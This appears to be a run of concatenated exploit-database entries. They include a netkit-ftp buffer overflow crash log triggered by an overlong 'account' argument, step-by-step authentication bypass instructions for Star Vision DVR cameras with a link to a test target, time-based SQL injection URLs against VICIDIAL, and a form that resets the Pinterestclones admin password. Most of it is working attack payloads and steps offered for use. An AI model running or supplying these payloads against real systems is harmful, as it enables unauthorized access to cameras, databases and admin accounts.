ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7338f)[0x7ffff784238f]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff78d9c9c]
/lib/x86_64-linux-gnu/libc.so.6(+0x109b60)[0x7ffff78d8b60]
/lib/x86_64-linux-gnu/libc.so.6(__strncat_chk+0x13c)[0x7ffff78d7f9c]
/usr/bin/ftp[0x407a08]
/usr/bin/ftp[0x402cd0]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5)[0x7ffff77f0ec5]
/usr/bin/ftp[0x402f49]
======= Memory map: ========
00400000-00413000 r-xp 00000000 08:01 656161 /usr/bin/netkit-ftp
00612000-00613000 r--p 00012000 08:01 656161 /usr/bin/netkit-ftp
00613000-00615000 rw-p 00013000 08:01 656161 /usr/bin/netkit-ftp
00615000-00665000 rw-p 00000000 00:00 0 [heap]
7ffff5e4e000-7ffff5e64000 r-xp 00000000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff5e64000-7ffff6063000 ---p 00016000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff6063000-7ffff6064000 rw-p 00015000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff6064000-7ffff6746000 r--p 00000000 08:01 662545 /usr/lib/locale/locale-archive
7ffff6746000-7ffff675d000 r-xp 00000000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff675d000-7ffff695d000 ---p 00017000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff695d000-7ffff695e000 r--p 00017000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff695e000-7ffff695f000 rw-p 00018000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so
7ffff695f000-7ffff6961000 rw-p 00000000 00:00 0
7ffff6961000-7ffff6966000 r-xp 00000000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6966000-7ffff6b65000 ---p 00005000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6b65000-7ffff6b66000 r--p 00004000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6b66000-7ffff6b67000 rw-p 00005000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so
7ffff6b67000-7ffff6b69000 r-xp 00000000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6b69000-7ffff6d68000 ---p 00002000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6d68000-7ffff6d69000 r--p 00001000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6d69000-7ffff6d6a000 rw-p 00002000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2
7ffff6d6a000-7ffff6d75000 r-xp 00000000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6d75000-7ffff6f74000 ---p 0000b000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6f74000-7ffff6f75000 r--p 0000a000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6f75000-7ffff6f76000 rw-p 0000b000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
7ffff6f76000-7ffff6f8d000 r-xp 00000000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
7ffff6f8d000-7ffff718c000 ---p 00017000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
7ffff718c000-7ffff718d000 r--p 00016000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
7ffff718d000-7ffff718e000 rw-p 00017000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
7ffff718e000-7ffff7190000 rw-p 00000000 00:00 0
7ffff7190000-7ffff7199000 r-xp 00000000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff7199000-7ffff7398000 ---p 00009000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff7398000-7ffff7399000 r--p 00008000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff7399000-7ffff739a000 rw-p 00009000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff739a000-7ffff73a5000 r-xp 00000000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff73a5000-7ffff75a4000 ---p 0000b000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff75a4000-7ffff75a5000 r--p 0000a000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff75a5000-7ffff75a6000 rw-p 0000b000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff75a6000-7ffff75cb000 r-xp 00000000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff75cb000-7ffff77ca000 ---p 00025000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff77ca000-7ffff77ce000 r--p 00024000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff77ce000-7ffff77cf000 rw-p 00028000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff77cf000-7ffff798a000 r-xp 00000000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff798a000-7ffff7b89000 ---p 001bb000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff7b89000-7ffff7b8d000 r--p 001ba000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff7b8d000-7ffff7b8f000 rw-p 001be000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff7b8f000-7ffff7b94000 rw-p 00000000 00:00 0
7ffff7b94000-7ffff7bd1000 r-xp 00000000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7bd1000-7ffff7dd1000 ---p 0003d000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7dd1000-7ffff7dd3000 r--p 0003d000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7dd3000-7ffff7dd9000 rw-p 0003f000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7dd9000-7ffff7dda000 rw-p 00000000 00:00 0
7ffff7dda000-7ffff7dfd000 r-xp 00000000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so
7ffff7fdf000-7ffff7fe2000 rw-p 00000000 00:00 0
7ffff7fea000-7ffff7feb000 rw-p 00000000 00:00 0
7ffff7feb000-7ffff7ff2000 r--s 00000000 08:01 920152 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
7ffff7ff2000-7ffff7ff8000 rw-p 00000000 00:00 0
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so
7ffff7ffd000-7ffff7ffe000 rw-p 00023000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Program received signal SIGABRT, Aborted.
0x00007ffff7805cc9 in __GI_raise (sig=sig@entry=6)
at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
# Exploit Title: Security IP Camera Star Vision DVR Authentication Bypass
# Date: 2015-08-13
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: #
# Version: All Versions
Exploit :
1 - First, open your Chrome browser
2 - Enter the IP address or domain to see the login screen of the camera
3 - Press the F12 key to open the browser console
4 - Click the Console tab and enter the following code
login_set(1,1,1,1);
5 - Now go to page view2.html
6 - enjoy seeing camera :)
Test : http://m.2.is/
Video Tutorial : http://s3.picofile.com/file/8206365584/cam.mp4.html
source: https://www.securityfocus.com/bid/55476/info
VICIDIAL Call Center Suite is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VICIDIAL Call Center Suite 2.2.1-237 and prior are vulnerable.
http://www.example.com/AST_agent_time_sheet.php?agent=some-agent' and sleep(15)='&calls_summary=1&query_date=2012-09-07
http://www.example.com/AST_timeonVDADall.php?adastats=1&DB=0&groups[]=1345' and sleep(15)='&RR=4
http://www.example.com/vicidial_demo/user_stats.php?user=2000' and sleep(10)='
source: https://www.securityfocus.com/bid/55469/info
Pinterestclones is prone to a security-bypass vulnerability and an HTML-injection vulnerability because it fails to properly validate user permissions and sanitize user-supplied input.
An attacker may leverage the HTML-injection issue to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. The attacker may leverage the security-bypass issue to bypass certain security restrictions and perform unauthorized actions in the affected application.
<form action="http://www.example.com/admin/settings.php" method="post" class="niceform" name="frmname" enctype="multipart/form-data">
Name:<input type="text" class="txtFname" name="name" id="name" size="50" value="Admin"/>
User Name:<input type="text" class="txtFname" name="uname" readonly="readonly" id="uname" size="50" value="admin@pinterestclones.com"/>
New Password:<input type="password" class="txtFname" name="password" id="password" size="50" value=""/>
Confirm Password:<input type="password" class="txtFname" name="cpassword" id="cpassword" size="50" value=""/>
Site Slogan:<input type="text" name="txtSlogan" id="txtSlogan" size="50" value="Your online pinboard"/>
Site URL:<input type="text" name="txtUrl" id="txtUrl" size="50" value=""/>
Admin Email:<input type="text" name="aemail" id="aemail" size="50" value=""/>
.Under maintenance:<select name="maintenance">
<option value="No" selected>No</option>
<option value="Yes">Yes</option>
</select>
Maintenance message:
<input type="text" name="maintenancemsg" id="maintenancemsg" size="50" value="We are upgrading the site."/>
<dl class="submit">
<input type="submit" value="Save" class="submit" name="sbmtbtn" style="width:50px;"/>
</form>